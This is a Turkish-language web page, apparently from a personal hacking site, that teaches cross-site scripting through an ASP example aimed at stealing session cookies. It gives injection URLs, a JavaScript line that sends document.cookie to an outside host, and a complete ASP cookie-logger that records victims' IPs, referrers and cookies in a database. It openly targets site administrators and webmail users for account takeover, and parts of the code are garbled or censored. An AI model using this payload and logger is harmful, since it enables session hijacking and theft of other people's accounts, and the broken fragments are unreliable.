xss açıgı ve kullanımıNetscape Communications Corporation, tarayıcılarında JS scriptlerini çalıştırabildiğni duyurduğunda, client ile server arasındaki bağlantı dolayısıyla i=new koduyla kullanıcının Çerez bilgilerinin çalınması sözkonusu oldu.

XSS nin Rfi ile çok küçük bir benzerliği var. Rfi Php scriptlerinde olur ve orda text dosyasındaki kodlar server da php olarak algılanır ve php olarak çalışır. Xss açığı ise açığın olduğu scriptte ister resim ister *.js ister iframe ne olursa olsun include edilebiliyor.

Size örnek bir Xss açığından bahsedeyim.

Active Server Page dilinde yazılmiş bir scripti ele alıyorum.

<%
X = Request.QueryString("id")
response.write X
%>

Görmüş oldu&eth;unuz örnek kodda QueryString Sayfaya yazdırılıyor.
Eğer URL kısmında ; http://site.com/ornek.asp?id=XSS yazıyorsa sayfanın herhangi biryerinde XSS yazar.
Bunun yerine;

1)Yazıyı renklendirebiliriz = http://site.com/ornek.asp?id=<font color=red>XSS</font>
2)Resim görüntüleyebilirz = http://site.com/ornek.asp?id=<img src= "http://site2.com/x.jpg">3)Ve güvenlik açığının oluştuğu,Microsoft’un başına dert olan ve milyonlarca Hotmail Hesabının hacklenmesine sebep olan JS kodu yani uzaktan script çalıştırılması.;

http://site.com/ornek.asp?id=******** src= "http://site3">
Şimdi biz x.js yi include ettik ama bu x.js nin içeriği ne olursa sisteme zarar verir ne olmazsa zarar vermez şimdi buna bakalım..

E&eth;er x.js nin içeriği

document.write(’XSS var’) ise sayfada sadece xss var yazar. Ama;

i=new/**/Image();i.Yasak Kelime#8217;http://site4.com/x.asp?X=’+document.cookie;

ise şu anda o url de gezinen kimsenin cookiesi x.asp nin X stringine kaydedilir.
şimdi x.asp nin içeriğine bakalım...

<%
Query = Request.QueryString("X")’ Degiskenler tanimlaniyor
If Query = "" Then ’Eger X=bos ise X degiskeni cookie yi alsın yani X=ASPSESSION seklinde karışık değerler..
%>

******** language="JavaScript" type="text/JavaScript">
var mxURL = "?X=" + document.cookie;
window.location = mxURL;
</script>


<%
end if
%>

<%
veri=request.querystring
veri2=right(veri,len(veri,-2)
adres = Request.ServerVariables("HTTP_REFERER")
Set conn = Server.CreateObject("adodb.connection") ’Burada veritabanı bağlantısı
conn.open "Provider=Microsoft.Jet.Oledb.4.0;Data Source="& Server.MapPath("sniffer.mdb")

set rs = Server.CreateObject("adodb.recordset")
SQL="Select * from sniffer"
rs.open SQL,conn,1,3

rs.addnew
rs("ip") = Request.ServerVariables("REMOTE_ADDR") ’IP veritabanına kaydediliyor
rs("adres") = adres ’Çerezin nerden geldiği kaydediliyor
rs("cookie") = veri2 ’Çerez kaydediliyor
rs("tarih") = now ’Burda tarih kaydediliyor çerezlerin karışmaması için
rs.update

rs.close
set rs = nothing
conn.close
set conn = nothing
%>

Burada cookie veritabanına kaydedildi.Şimdi isterseniz bu çerezlere server üzerinden bir fso ile takip edersiniz ister bunları döngüleyecek bir script yazarsınız.Orası size kalmış..
Küçük bir açıklama daha yapacağım;
*Cookielerin çalınmasının amacı sitenin adminlerine yöneliktir çünkü onun giriş yaptığı oturum en yetkili olandır.Normal bir userle siteye zarar veremezsiniz.
*Çerez hırsızlıgının bir başka kullanım alanı ise Mail Sistemlerindeki Cross Site Scripting açıklarının kullanımıdır.Burda hangi oturumun çerezini çalarsanız o kullanıcının mail adresine giriş yapabilirsiniz.Bu sayfa hakkında yorum ekle:
İsmin:
Siten:
Mesajınız:
ANKETLER
 


SİZCE EN İYİ ANTİ-VÜRİS HANGİSİ ?
KESPERSKY 39,53%
NOD32 13,95%
PANDA 10,47%
AVAST 12,79%
AVG 5,81%
AVİRA ANTİVİR 8,14%
MCAFEE 2,33%
NORTON 6,98%
ZONEALARM 0%
86 toplam oy:


Reklam
 
 
z-kutu_doldurmaca
20 saniyede kaç kutu doldurabilirsiniz?
GÜNÜN SÖZÜ
 
GÜNÜN GEREKSİZ BİLGİSİ
 
Kağıt para pek
çok insanın zannettiği
gibi kağıttan değil,
ketenden imal edilir.
1950’den önce
ise kenevir,
ağaç kabuğu ve
marijuanna yaprağı
kullanılarak üretilirdi.
GÜNÜN ATA SÖZÜ
 
Çin Atasözü


Köseye sıkışınca
bir tavsan bile isirir.
 
sisteme baglı 25202 ziyaretçi
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=
SERHAT